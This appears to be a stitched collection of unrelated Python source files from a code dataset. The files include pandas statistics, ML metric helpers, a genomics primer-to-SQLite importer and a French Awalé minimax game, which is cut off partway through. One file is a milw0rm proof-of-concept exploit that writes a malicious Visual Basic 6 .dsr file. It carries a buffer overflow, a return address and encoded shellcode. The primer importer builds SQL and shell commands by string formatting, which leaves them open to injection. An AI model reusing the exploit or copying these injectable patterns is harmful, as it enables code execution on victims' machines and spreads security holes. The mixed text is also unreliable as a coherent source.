# 定义模板上下文
# 模板渲染
statoc_index_html = temp.render(context)
save_path = os.path.join(settings.BASE_DIR, 'static/static_index/index.html')
with open(save_path,'w',encoding='utf-8') as f:
f.write(statoc_index_html)
|
9,585 | 40a73ceeeb310c490fe2467511966679a1afa92b | #usage: exploit.py
print "-----------------------------------------------------------------------"
print ' [PoC 2] MS Visual Basic Enterprise Ed. 6 SP6 ".dsr" File Handling BoF\n'
print " author: shinnai"
print " mail: shinnai[at]autistici[dot]org"
print " site: http://shinnai.altervista.org\n"
print " Once you create the file, open it with Visual Basic 6 and click on"
print " command name."
print "-----------------------------------------------------------------------"
buff = "A" * 555
get_EIP = "\xFF\xBE\x3F\x7E" #call ESP from user32.dll
nop = "\x90" * 12
shellcode = (
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"
"\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x44\x4e\x43\x4b\x38\x4e\x47"
"\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x54\x4a\x41\x4b\x38"
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x48"
"\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c"
"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x43\x46\x35\x46\x52\x46\x30\x45\x37\x45\x4e\x4b\x58"
"\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x48\x4e\x30\x4b\x44"
"\x4b\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x4b\x38\x4e\x51\x4b\x38"
"\x41\x50\x4b\x4e\x49\x38\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"
"\x42\x4c\x46\x46\x4b\x48\x42\x34\x42\x33\x45\x38\x42\x4c\x4a\x47"
"\x4e\x30\x4b\x38\x42\x34\x4e\x50\x4b\x58\x42\x47\x4e\x41\x4d\x4a"
"\x4b\x58\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x48\x42\x48\x42\x4b"
"\x42\x30\x42\x50\x42\x30\x4b\x38\x4a\x56\x4e\x43\x4f\x55\x41\x33"
"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x37"
"\x42\x55\x4a\x36\x42\x4f\x4c\x58\x46\x50\x4f\x35\x4a\x36\x4a\x59"
"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x56\x41\x56"
"\x4e\x46\x43\x56\x50\x32\x45\x46\x4a\x37\x45\x36\x42\x50\x5a"
)
dsrfile = (
"VERSION 5.00\n"
"Begin {C0E45035-5775-11D0-B388-00A0C9055D8E} DataEnvironment1\n"
" ClientHeight = 6315\n"
" ClientLeft = 0\n"
" ClientTop = 0\n"
" ClientWidth = 7980\n"
" _ExtentX = 14076\n"
" _ExtentY = 11139\n"
" FolderFlags = 1\n"
' TypeLibGuid = "{D7133993-3B5A-4667-B63B-749EF16A1840}"\n'
' TypeInfoGuid = "{050E7898-66AC-4150-A213-47C7725D7E7E}"\n'
" TypeInfoCookie = 0\n"
" Version = 4\n"
" NumConnections = 1\n"
" BeginProperty Connection1\n"
' ConnectionName = "Connection1"\n'
" ConnDispId = 1001\n"
" SourceOfData = 3\n"
' ConnectionSource= ""\n'
" Expanded = -1 'True\n"
" QuoteChar = 96\n"
" SeparatorChar = 46\n"
" EndProperty\n"
" NumRecordsets = 1\n"
" BeginProperty Recordset1\n"
' CommandName = "Command1"\n'
" CommDispId = 1002\n"
" RsDispId = 1003\n"
' CommandText = "' + buff + get_EIP + nop + shellcode + nop + '"\n'
' ActiveConnectionName= "Connection1"\n'
" CommandType = 2\n"
" dbObjectType = 1\n"
" Locktype = 3\n"
" IsRSReturning = -1 'True\n"
" NumFields = 1\n"
" BeginProperty Field1\n"
" Precision = 10\n"
" Size = 4\n"
" Scale = 0\n"
" Type = 3\n"
' Name = "ID"\n'
' Caption = "ID"\n'
" EndProperty\n"
" NumGroups = 0\n"
" ParamCount = 0\n"
" RelationCount = 0\n"
" AggregateCount = 0\n"
" EndProperty\n"
"End\n"
'Attribute VB_Name = "DataEnvironment1"\n'
"Attribute VB_GlobalNameSpace = False\n"
"Attribute VB_Creatable = True\n"
"Attribute VB_PredeclaredId = True\n"
"Attribute VB_Exposed = False\n"
)
try:
out_file = open("DataEnvironment1.dsr",'w')
out_file.write(dsrfile)
out_file.close()
print "\nFILE CREATION COMPLETED!\n"
except:
print " \n -------------------------------------"
print " Usage: exploit.py"
print " -------------------------------------"
print "\nAN ERROR OCCURS DURING FILE CREATION!"
# milw0rm.com [2008-04-04]
|
9,586 | f5542cfe6827c352cc6e6da1147e727f2b2d8247 | import pandas as pd
import numpy
dato=pd.read_csv('medallero_Panamericanos_Lima2019.csv')
print(dato)
def calculo_suma():
print("---Funcion con Python---")
print("la sumatoria de los valores: ", dato['Bronce'].sum())
print("---Funcion con Numpy---")
print("la sumatoria de los valores: ", numpy.sum(dato['Bronce']))
print("---Otras Formas---")
print(dato.Bronce.sum())
print(numpy.sum(dato.Bronce))
def calculo_conteo():
print("---Funcion de Python---")
print("Los número de elementos son :",len(dato['Bronce']))
print(len(dato.Bronce))
print("---Funcion de Pandas---")
print("Los número de elementos son :",dato['Bronce'].count())
print(dato.Bronce.count())
print("---Funcion de Numpy---")
print("Los número de elementos son :",numpy.size(dato['Bronce']))
print(numpy.size(dato.Bronce))
def calculo_media():
print("---Funcion de Python---")
print("La media es: ",dato.Bronce.sum()/dato.Bronce.count())
print("---Funcion de Pandas---")
print("La media es: ",dato.Bronce.mean())
print("---Funcion de Numpy---")
print("La media es: ",numpy.mean(dato.Bronce))
def calculo_media2(redondeo=2):
print("---Mediana con 2 decimales---")
media=dato.Bronce.mean()
media=round(media, redondeo)
return media
def calculo_moda():
moda=dato.Bronce.mode()
return moda
def calculo_mediana():
nro_item=numpy.size(dato.Bronce)
pos_mediana=round(nro_item/2)
print('Posicion mediana: ', pos_mediana)
mediana=dato.Bronce[pos_mediana-1]
return mediana
def calculo_percentiles():
tramos =[20, 50, 75]
percentiles=numpy.percentile(dato['Bronce'], tramos)
print('Percentiles', percentiles)
def grafico_percentil():
import matplotlib.pylab as plt
import seaborn as sb
sb.boxplot(y="Bronce", data=dato)
plt.show()
def calculo_varianza():
vari=numpy.var(dato)
print("La varianza es:" ,vari)
calculo_varianza()
|
9,587 | eea962d6c519bee802c346fcf8d0c7410e00c30b | h = int(input())
a = int(input())
b = int(input())
c = (h - b + a - b - 1) // (a - b)
print(int(c))
|
9,588 | 11ca13aca699b1e0744243645b3dbcbb0dacdb7e | import random as rnd
import pandas as pd
from sklearn.metrics import accuracy_score
from sklearn.metrics import f1_score
from sklearn.metrics import roc_auc_score
from sklearn.metrics import confusion_matrix
from sklearn.metrics import precision_recall_fscore_support, roc_auc_score
import os
def mkdir_tree(source):
if source is None:
source = 'default'
base_dirs = ['../data/clf_meta/%s/'%source]
# hostname = socket.gethostname()
# print('hostname is', hostname)
# if 'arc-ts.umich.edu' in hostname:
# base_dirs.append('/scratch/cbudak_root/cbudak/lbozarth/fakenews/data/clf_meta/%s'%source)
print('base_dirsssssss', base_dirs)
for base_dir in base_dirs:
if not os.path.exists(base_dir):
print('mkdir', base_dir)
os.mkdir(base_dir)
if source == 'RDEL':
subdirs = ['models', 'preds', 'features', 'vectorizers']
else:
subdirs = ['models', 'preds']
datasets = ['default', 'events', 'increment', 'nela', 'fakenewscorpus', 'forecast', 'events_v2', 'valarch']
datasets2 = ['default', 'nela', 'fakenewscorpus']
datasets3 = ['bydomains', 'byforecast', 'basic']
for d in subdirs:
sub_dir = os.path.join(base_dir, d)
if not os.path.exists(sub_dir):
print('mkdir', sub_dir)
os.mkdir(sub_dir)
for dataset in datasets:
dataset_path = os.path.join(sub_dir, dataset)
if not os.path.exists(dataset_path):
print('mkdir', dataset_path)
os.mkdir(dataset_path)
if dataset == 'increment' or dataset=='valarch':
for ds2 in datasets2:
ds2_path = os.path.join(dataset_path, ds2)
if not os.path.exists(ds2_path):
print('mkdir', ds2_path)
os.mkdir(ds2_path)
if dataset=='valarch':
for ds3 in datasets3:
ds3_path = os.path.join(ds2_path, ds3)
if not os.path.exists(ds3_path):
print('mkdir', ds3_path)
os.mkdir(ds3_path)
print('finished making directory tree')
return
def gen_rand_dates(dataset="default", start_date='2016-06-15', end_date='2016-12-30', n=10):
rand_dates = []
for i in range(n):
dt = pd.to_datetime(rnd.choice(pd.bdate_range(start_date, end_date)))
rand_dates.append(dt)
print(sorted(rand_dates))
return rand_dates
def evaluate_clf_preformance(y_true, y_pred, y_pred_prob):
tn, fp, fn, tp = confusion_matrix(y_true, y_pred).ravel()
auc = roc_auc_score(y_true, y_pred_prob)
accu = accuracy_score(y_true, y_pred)
f1_macro = f1_score(y_true, y_pred, average='macro', pos_label=1)
f1_micro = f1_score(y_true, y_pred, average='micro', pos_label=1)
f1_weighted = f1_score(y_true, y_pred, average='weighted', pos_label=1)
f1_pos = f1_score(y_true, y_pred, pos_label=1)
f1s = f1_score(y_true, y_pred, average=None)
f1_real = None
for f in f1s:
if f!=f1_pos:
f1_real = f
print('auc, accuracy, f1_micro, f1_macro, f1_weighted, f1_fake, f1_real are', auc, accu, f1_micro, f1_macro, f1_weighted, f1_pos, f1_real)
return {'auc_score':auc, 'accuracy_score':accu, 'f1_micro':f1_micro, 'f1_macro':f1_macro, 'f1_weighted':f1_weighted,
'f1_fake':f1_pos, 'f1_real':f1_real, 'tn':tn, 'fp':fp, 'fn':fn, 'tp':tp}
import numpy as np
def gen_precision_recall(y_true, y_pred):
percision, recall, f1s, _ = precision_recall_fscore_support(y_true, y_pred, average=None, pos_label=1)
if len(f1s) == 1:
return np.nan, np.nan # [1][1]; too few values
return percision[1], recall[1] #for fake only
def gen_fnr_fpr(y_true, y_pred):
try:
tn, fp, fn, tp = confusion_matrix(y_true, y_pred).ravel()
# # Sensitivity, hit rate, recall, or true positive rate
# TPR = TP / (TP + FN)
# # Specificity or true negative rate
# TNR = TN / (TN + FP)
# # Precision or positive predictive value
# PPV = TP / (TP + FP)
# # Negative predictive value
# NPV = TN / (TN + FN)
# # Fall out or false positive rate
# FPR = FP / (FP + TN)
# # False negative rate
# FNR = FN / (TP + FN)
# # False discovery rate
# FDR = FP / (TP + FP)
return 1.0 * tn / (fp + tn), 1.0 * tp / (fn + tp), 1.0 * (tp + tn) / (tp + fp + fn + tn)
except Exception as e:
return np.nan, np.nan, np.nan # [1][1]; too few values |
9,589 | 8a3cf65550893367b9001369111fa19a3e998d82 | import oneflow as flow
import torch
def convert_torch_to_flow(model, torch_weight_path, save_path):
parameters = torch.load(torch_weight_path)
new_parameters = dict()
for key, value in parameters.items():
if "num_batches_tracked" not in key:
val = value.detach().cpu().numpy()
new_parameters[key] = val
model.load_state_dict(new_parameters)
flow.save(model.state_dict(), save_path)
|
9,590 | c41388043295280f9354e661a8d38ae46cae2d65 | #for declaring the variables used in program
img_rows=200
img_cols=200
img_channels=1
nb_classes=3
nb_test_images=1
|
9,591 | 1d817ee09705301b574c421a9ff716748c146fdd | import pandas as pd
import re
import sqlite3 as lite
import os
from pybedtools import BedTool
import django
from checkprimers import CheckPrimers
from pandas import ExcelWriter
import datetime
os.environ['DJANGO_SETTINGS_MODULE'] = 'mysite.settings'
django.setup()
class GetPrimers(object):
"""Extracts data from excel spread sheet and imports it into a sqlite database.
:param excel_file: excel file to be imported.
:param db: database the excel file should be imported into.
"""
def __init__(self, excel_file, db):
self.excel_file = excel_file
self.db = db
global con, curs
con = lite.connect(self.db) # Creates a database if it doesn't already exist.
curs = con.cursor()
def get_sheet_name(self):
"""Returns the sheetname to be used to import data from."""
xl = pd.ExcelFile(self.excel_file)
sheet_names = xl.sheet_names
for item in sheet_names:
if re.match('(.*)Current primers', item, re.IGNORECASE): # Only extracts most recent primers.
sheet_name = item
return sheet_name
def get_primers(self, sheetname):
"""Extracts primer data from sheet.
Function reads an excel sheet using pandas and stores this in the df_primers_dups data frame (contains
duplicated rows).The df_primers data frame will go on to be used in the virtual PCR so irrelevant columns
are dropped and any duplicate rows are removed.
:param sheetname: sheet data to be extracted from
:return df_primers_dups: data frame containing extracted data which may include duplicates.
:return df_primers: data frame containing only data necessary to get genome coordinates.
"""
df_primers_dups = pd.read_excel(self.excel_file, header=0, parse_cols='A:M, O:X', skiprows=2,
names=['Gene', 'Exon', 'Direction', 'Version', 'Primer_seq', 'Chrom', 'M13_tag',
'Batch', 'project', 'Order_date', 'Frag_size', 'anneal_temp', 'Other',
'snp_check', 'no_snps', 'rs', 'hgvs', 'freq', 'ss', 'ss_proj', 'other2',
'action_to_take', 'check_by'],
sheetname=sheetname, index_col=None)
to_drop = ['Version', 'M13_tag', 'Batch', 'project', 'Order_date', 'Frag_size', 'anneal_temp', 'Other',
'snp_check', 'no_snps', 'rs', 'hgvs', 'freq', 'ss', 'ss_proj', 'other2', 'action_to_take',
'check_by']
df_primers_dups = df_primers_dups.where((pd.notnull(df_primers_dups)), None) # easier to work with than NaN
df_primers = df_primers_dups.drop(to_drop, axis=1)
df_primers = df_primers.drop_duplicates(subset=('Gene', 'Exon', 'Direction', 'Chrom'))
df_primers = df_primers.reset_index(drop=True)
return df_primers_dups, df_primers
def run_pcr(self, csv):
"""Runs virtual PCR on a CSV file using the isPcr and pslToBed tools installed from UCSC.
:param csv: a csv file is need as an input with format "name, forward, reverse".
:return bedfile: with results of virtual PCR if there is a match.
"""
print "Running virtual PCR..."
chromosomes = ['chr1.2bit', 'chr11.2bit', 'chr12.2bit', 'chrX.2bit', 'chr13.2bit', 'chr14.2bit', 'chr15.2bit',
'chr16.2bit', 'chr17.2bit', 'chr18.2bit', 'chr19.2bit', 'chr20.2bit', 'chr21.2bit', 'chr22.2bit',
'chr2.2bit', 'chr3.2bit', 'chr4.2bit', 'chr5.2bit', 'chr6.2bit', 'chr7.2bit', 'chr8.2bit',
'chr9.2bit', 'chr10.2bit', 'chrY.2bit']
for chr in chromosomes:
os.system(
"/opt/kentools/isPcr -out=psl /media/genomicdata/ucsc_hg19_by_chr/2bit_chr/%s \
%s %s.tmp.psl" % (chr, csv, chr[:-5]))
pslfile = "%s.tmp.psl" % chr[:-5]
bedfile = "%s.tmp.bed" % chr[:-5]
# Only converts a non-empty psl file to a bed file, and removes all psl files in folder.
if os.path.getsize(pslfile) != 0:
os.system("/opt/kentools/pslToBed %s %s" % (pslfile, bedfile))
os.system("rm %s" % pslfile)
return bedfile
else:
os.system("rm %s" % pslfile)
def get_coords(self, df_primers):
"""Generates csv file for virtual PCR and imports results into a pandas data frame.
:param df_primers: data frame of primer data.
:return df_coords: data frame with chromosome, start and end coordinates, and a name
(format "Gene_ExonDirection") for each primer.
"""
primer_list = []
names_dup = []
names = []
exons = []
dirs = []
start_coords = []
end_coords = []
chroms = []
seq_position = 0
list_position = 0
primer_seqs = pd.DataFrame([])
csv = '%s.csv' % self.excel_file[:-5]
csv = csv.replace(" ", "")
# (1) Gets sequences, exons and directions, splits the sequences into F+R and combines into series and then csv.
for row_index, row in df_primers.iterrows():
primer_list.append(str(row['Primer_seq']))
names_dup.append(str(row['Gene']) + '_' + str(row['Exon']) + str(row['Direction']))
exons.append(str(row['Exon']))
dirs.append(str(row['Direction']))
for item in names_dup:
if item not in names:
names.append(item)
forwards = primer_list[::2]
reverses = primer_list[1::2]
while list_position < len(forwards):
ser = pd.Series([names[list_position], forwards[list_position], reverses[list_position]])
primer_seqs = primer_seqs.append(ser, ignore_index=True)
list_position += 1
primer_seqs.to_csv(csv, header=None, index=None, sep='\t')
# (2) Runs virtual PCR on generated csv.
bedfile = self.run_pcr(csv)
tool = BedTool(bedfile)
# (3) Uses results to calculate start and end position of each primer (results give PCR product). Adds to df.
for row in tool:
chroms.append(row.chrom)
start_coords.append(row.start)
end_coords.append(row.start + len(primer_list[seq_position]))
chroms.append(row.chrom)
end_coords.append(row.end)
start_coords.append(row.end - len(primer_list[seq_position + 1]))
seq_position += 1
df_coords = pd.DataFrame([])
df_coords.insert(0, 'chrom', chroms)
df_coords.insert(1, 'start', start_coords)
df_coords.insert(2, 'end', end_coords)
df_coords.insert(3, 'name', names)
# (4) Generates a bed file from df_coords (not currently used in application).
bed = os.path.splitext(bedfile)[0]
df_coords.to_csv('%s.csv' % bed, header=None, index=None, sep='\t') # cannot directly convert to bed.
csv_file = BedTool('%s.csv' % bed)
csv_file.saveas('%s.bed' % bed)
df_coords.insert(4, 'Exon', exons) # not need in bed file so added after.
df_coords.insert(5, 'Direction', dirs)
# Removes unnecessary files and moves BED file into shared folder. (add /tests for unit testing)
os.system("rm /home/cuser/PycharmProjects/django_apps/mysite/%s.csv" % bed)
os.system("mv /home/cuser/PycharmProjects/django_apps/mysite/%s.bed /media/sf_sarah_share/bedfiles" %
bed)
os.system("rm /home/cuser/PycharmProjects/django_apps/mysite/%s" % csv)
return df_coords
def col_to_string(self, row):
"""Converts values in the Exon column into string values which makes merging data frames easier.
:param row: for every row in Exon column.
:return string of value.
"""
return str(row['Exon'])
def combine_coords_primers(self, df_coords, df_primers_dups):
"""Adds primer coordinates to original df_primers_dups data frame.
:param df_primers_dups: data frame with primer data from excel.
:param df_coords: data frame with chrom, start, end, name, exon, direction.
:return df_combined: data frame of merge between df_coords and df_primers_dups.
:return gene_name: this will be added to the Genes table and used to check if already in database.
"""
df_coords['Exon'] = df_coords.apply(self.col_to_string, axis=1)
df_primers_dups['Exon'] = df_primers_dups.apply(self.col_to_string, axis=1)
# Merge based on Exon and Direction columns
df_combined = pd.merge(df_primers_dups, df_coords, how='left', on=['Exon', 'Direction'])
# There is already a Chromosome column in df_primers_dups
cols_to_drop = ['chrom']
df_combined = df_combined.drop(cols_to_drop, axis=1)
gene_name = df_combined.get_value(0, 'Gene')
return df_combined, gene_name
def check_in_db(self, gene):
"""Queries the database to check if data for a particular gene is already present.
:param gene: a gene name to check against the database.
:return result: query result which will be a gene if already in database and None if not.
"""
curs.execute("SELECT Gene FROM Genes WHERE Gene LIKE '%s'" % gene)
result = curs.fetchone()
return result
def to_db(self, df_combined, gene_name):
"""Creates tables and adds data into the database.
Function modifies the given data frame to generate three tables in the database (Primers, SNPs, Genes) and
performs data checks. If data for a particular gene is already in the database, this is overridden and the
previous data is saved to an excel document (archived_files).
The commented out section should only be used for the first file to initially set up the tables.
:param gene_name: gene to check against database.
:param df_combined: data frame to be inserted into database.
:return info: description of action performed (for audit log).
:return archived_filename: filename the previous data is saved under (for audit log).
"""
# (1) Creates database schema
curs.execute("CREATE TABLE IF NOT EXISTS Primers(PrimerId INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL, "
"Gene TEXT, Exon TEXT, Direction TEXT, Version INTEGER, Primer_Seq TEXT, Chrom TEXT, M13_Tag TEXT"
", Batch TEXT, Project TEXT, Order_date TEXT, Frag_size INTEGER, Anneal_Temp TEXT, Other TEXT, "
"snp_check INTEGER, no_snps INTEGER, rs TEXT, hgvs TEXT, freq TEXT, ss TEXT, ss_proj TEXT, "
"other2 TEXT, action_to_take TEXT, check_by TEXT, start TEXT, end TEXT, name TEXT)")
curs.execute("CREATE TABLE IF NOT EXISTS SNPs(SNP_Id INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL, Gene TEXT, "
"Exon TEXT, Direction TEXT, snp_check INTEGER, rs TEXT, hgvs TEXT, freq TEXT, ss TEXT, "
"ss_proj TEXT, other2 TEXT, action_to_take TEXT, check_by TEXT, name TEXT)")
curs.execute("CREATE TABLE IF NOT EXISTS Genes(Gene_Id INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL, Gene TEXT)")
# (2) Drops unnecessary columns to make two tables and removes duplicates.
primertable_cols_to_drop = ['snp_check', 'rs', 'hgvs', 'freq', 'ss', 'ss_proj', 'other2', 'action_to_take',
'check_by']
snptable_cols_to_drop = ['Exon', 'Direction', 'Version', 'Primer_seq', 'Chrom', 'M13_tag', 'Batch', 'project',
'Order_date', 'Frag_size', 'anneal_temp', 'Other', 'no_snps', 'start', 'end']
df_primertable = df_combined.drop(primertable_cols_to_drop, axis=1)
df_primertable = df_primertable.drop_duplicates(subset=('Gene', 'Exon', 'Direction', 'Chrom'))
df_snptable = df_combined.drop(snptable_cols_to_drop, axis=1)
# (3) Performs data checks using CheckPrimers and CheckSNPs classes.
check = CheckPrimers(df_primertable, df_snptable)
total_errors, error_details = check.check_all()
# (4) Checks if gene data already in database.
uni_gene = '(u\'%s\',)' % gene_name
gene = self.check_in_db(gene_name) # this outputs a unicode string
# (5) Adds to database if no errors. Overrides data if already present.
archived_filename = None
if total_errors == 0:
if str(uni_gene) == str(gene):
# Add query to data frame then save to excel.
get_old_query = "SELECT p.Gene, p.Exon, p.Direction, p.Version, p.Primer_seq, p.Chrom, p.M13_Tag, " \
"p.Batch, p.Project, p.Order_date, p.Frag_size, p.Anneal_Temp, p.Other, s.snp_check, " \
"p.no_snps, s.rs, s.hgvs, s.freq, s.ss, s.ss_proj, s.other2, s.action_to_take, " \
"s.check_by FROM SNPs s LEFT JOIN Primers p ON s.name = p.name WHERE p.Gene='%s'" % \
gene_name
today_date = datetime.datetime.now().strftime("%d-%m-%Y_%H%M")
df_sql = pd.read_sql_query(get_old_query, con=con)
archived_filename = '%s_%s' % (gene_name, today_date)
writer = ExcelWriter('%s.xlsx' % archived_filename)
df_sql.to_excel(writer, '%s' % today_date, index=False)
writer.save()
os.system("mv /home/cuser/PycharmProjects/django_apps/mysite/%s.xlsx "
"/home/cuser/PycharmProjects/django_apps/mysite/primerdb/archived_files/" % archived_filename)
curs.execute("DELETE FROM Primers WHERE Gene='%s'" % gene_name)
curs.execute("DELETE FROM Genes WHERE Gene='%s'" % gene_name)
curs.execute("DELETE FROM SNPs WHERE Gene='%s'" % gene_name)
info = "Data updated."
else:
info = "New gene added."
# Insert new data into SQL tables.
curs.execute("INSERT INTO Genes (Gene) VALUES (?)", (gene_name,))
df_primertable.to_sql('Primers', con, if_exists='append', index=False)
df_snptable.to_sql('SNPs', con, if_exists='append', index=False)
print "Primers successfully added to database."
else:
info = error_details
con.commit()
return info, archived_filename
def all(self):
"""Combines all methods"""
sheetname = self.get_sheet_name()
df_primers_dups, df_primers = self.get_primers(sheetname)
df_coords = self.get_coords(df_primers)
df_combined, gene = self.combine_coords_primers(df_coords, df_primers_dups)
info, archived_filename = self.to_db(df_combined, gene)
return info, archived_filename
|
9,592 | 576d6bec4a91ba6f0597b76a5da5ad3ef6562b19 | import numpy as np
#!pip install pygame
import pygame
#from copy import deepcopy
pygame.init()
#-----------
# Modifications (Matthieu, 15/04):
# Modification de la représentation du terrain du jeu. Il est maintenant représenté par une seule liste.
# un seul identifiant par coupe semble plus simple à gérer qu'un couple (joueur,numero)
# Les indices de la liste correspondant à chaque coupe sont par exemple :
# [11] [10] [9] [8] [7] [6] ligne de l'ordi (joueur 1)
# [0] [1] [2] [3] [4] [5] ligne du joueur (joueur 0)
# Modifications de certaines fonctions de vérification des règles pour éviter les deepcopy
# Simplification de la structure de l'arbre (structure de dictionnaire contenant les fils de chaque noeud)
# On ne le construit que pour une profondeur donnée profondeurArbre (1 par défaut), ou même pas du tout
# Algo alpha beta
# Pbs :
# Fonction qui permettrait de détecter les situations ou le jeu peut boucler à l'infini
# Pouvoir tester les performances de l'ia, par exemple sur quelques centaines de parties, combien de %
# sont gagnées par l'ia contre un algo qui joue aléatoirement
# Améliorer la fonction d'évaluation qui est pour l'instant très basique
##-------------
# Le terrain de jeu est un tableau de deux lignes (les deux camps) et de nCoupes colonnes (les coupelles),
# contenant initialement n graines. La première constitue le camp du joueur, la seconde, celle de l'ordinateur.
# Dans chaque camp, les coupelles sont numérotées de 1 à nCoupes.
# A chaque tour, le joueur doit choisir un numéro de coupelle.
# Les graines de celle-ci sont alors transférées dans les coupes suivantes etc.
#
# modifs du 17.03 par Léo:
# -suppression de scoreGagnant, qui n'apparait pas dans les règles de base de l'Awalé
# -Pour faciliter les manipulations du code et sa compréhension, on parle maintenant
# du joueur 0 et du joueur 1 (au lieu de 1 et 2) et les coupelles sont numérotées de 0 à nCoupes-1.
#Notions de classe:
#https://openclassrooms.com/fr/courses/235344-apprenez-a-programmer-en-python/232721-apprehendez-les-classes
#Explication de l'algorithme minimax général (page 52) :
#http://stephane.ayache.perso.luminy.univ-amu.fr/zoom/cours/Cours/IA_Jeux/IAEtJeux2.pdf
#Code par Léo et Paul
#Pb: le jeu peut boucler à l'infini à la fin d'une partie (souvent lorsqu'il reste 2 graines disposées symétriquement)
# -> se pencher sur la fonction "partieFinie" et peut-être essayer d'intégrer cette fonction dans l'algo récursif minimax..
#Pb: structure d'arbre trop compliquée: (*)
#l'arbre est construit à partir d'une liste selon le principe suivant:
#les nCoupes fils de l'élément d'indice k sont d'indices k*nCoupes + l, avec l variant entre 1 et nCoupes
#On vérifie alors (à l'aide d'un dessin par exemple) qu'il y a une bijection naturelle entre la structure d'arbre et la liste (ou tableau) de taille voulue
class terrainDeJeu:
# [11] [10] [9] [8] [7] [6]// ligne de l'ordi (joueur 1)
# [0] [1] [2] [3] [4] [5]// ligne du joueur (joueur 0)
def __init__(self,nCoupes,profondeur,nGrainesParCoupelle=4) : #Constructeur
self.plateau = np.full(2*nCoupes,nGrainesParCoupelle)
self.nGrainesParCoupelleInit = nGrainesParCoupelle
self.nCoupes = nCoupes
self.scores = [0,0] # scores[0] = score du joueur 0...
self.tour = 0
self.finie = False
self.profondeurMinimax = profondeur
self.arbreFils = {}
#clone le terrain de jeu pour pouvoir simuler un coup par la suite
def clone(self):
clone = terrainDeJeu(self.nCoupes,self.profondeurMinimax,self.nGrainesParCoupelleInit)
clone.plateau= self.plateau.copy()
clone.scores = self.scores.copy()
clone.tour = self.tour
clone.finie = self.finie
return clone
#retourne l'id de la coupe suivant idCoupe sur le plateau (suivant = sens trigo)
def coupeSuivante(self,idCoupe):
return (idCoupe + 1)%(2*self.nCoupes)
#retourne l'id de la coupe précédant idCoupe sur le plateau (précédant = sens horaire)
def coupePrecedente(self,idCoupe):
return (idCoupe - 1)%(2*self.nCoupes)
#retourne le joueur (0 ou 1) à qui appartient la coupe idCoupe
def joueurCoupe(self,idCoupe):
return 0 if idCoupe < self.nCoupes else 1
#retourne si idCoupe peut être prise (contient 2 ou 3 graines)
def coupePrenable(self,idCoupe):
return (self.plateau[idCoupe]==2 or self.plateau[idCoupe]==3)
def deplacer(self,joueur,idCoupe):
coupeInitiale = idCoupe #id de la coupelle choisie
nGraines = self.plateau[idCoupe]
self.plateau[idCoupe] = 0
while (nGraines != 0): #On redistribue les graines de la coupelle initiale
idCoupe = self.coupeSuivante(idCoupe)
if (idCoupe != coupeInitiale): #On ne redistribue pas dans la coupelle initiale
self.plateau[idCoupe] += 1
nGraines -= 1
coupeFinale = idCoupe
joueurCoupeFinale = self.joueurCoupe(coupeFinale)
if (joueur != joueurCoupeFinale):
#on vérifie si on va affamer l'adversaire
#si non, on prend les graines normalement
if (self.nourrirAdversaire(joueur,coupeFinale)):
while (self.joueurCoupe(idCoupe)==joueurCoupeFinale and self.coupePrenable(idCoupe)):
self.scores[joueur]+=self.plateau[idCoupe]
self.plateau[idCoupe]=0
idCoupe = self.coupePrecedente(idCoupe)
#si on va affamer l'adversaire :
# on ne prend aucune graine donc on ne fait rien
self.tour=(self.tour+1)%2
#On compte le nombre de graines restantes sur le plateau
def grainesRestantes(self):
return np.sum(self.plateau)
#on compte le nombre de graines restantes sur le plateau pour les coupes de joueur
def grainesRestantesJoueur(self,joueur):
if joueur==0:
return np.sum(self.plateau[0:self.nCoupes])
else:
return np.sum(self.plateau[self.nCoupes:len(self.plateau)])
#détermine si, dans le cas où joueur finit son coup sur la coupe coupeFinale,
#Yson adversaire sera affamé ou pas
#on regarde donc si il restera au moins une graine sur le terrain de l'adversaire
def nourrirAdversaire(self,joueur,coupeFinale):
adversaire = (joueur+1)%2
#on commence la vérification à la coupe la plus éloignée de adversaire (dans le sens horaire)
admissible = False
idCoupe = (self.nCoupes*(adversaire+1))-1
while (self.joueurCoupe(idCoupe)==adversaire):
#si idCoupe est après coupeFinale et qu'il reste des graines dedans le coup est admissible
if (idCoupe>coupeFinale and self.plateau[idCoupe]!=0):
admissible=True
#si joueur peut pas prendre la coupe idCoupe le coup est admissible
elif (not self.coupePrenable(idCoupe)):
admissible=True
idCoupe=self.coupePrecedente(idCoupe)
#True si le coup est admissible pour la règle "nourrir"
return admissible
#coupes admissibles que peut jouer joueur pour nourrir son adversaire
def coupesAdmissiblesNourrir(self,joueur):
coupesAdmissibles = []
#on commence par la coupe la plus proche de l'adversaire (dans le sens trigo)
idCoupe = (self.nCoupes*(joueur+1))-1
distance = 1
while (self.joueurCoupe(idCoupe)==joueur):
#s'il y a plus de graines dans idCoupe que la distance qui la sépare aux coupes de l'adversaire
#le coup est admissible, au moins une graine nourrira l'adversaire
if self.plateau[idCoupe]>=distance:
coupesAdmissibles.append(idCoupe)
idCoupe = self.coupePrecedente(idCoupe)
distance +=1
return coupesAdmissibles
def coupesAdmissibles(self,joueur):
adversaire = (joueur+1)%2
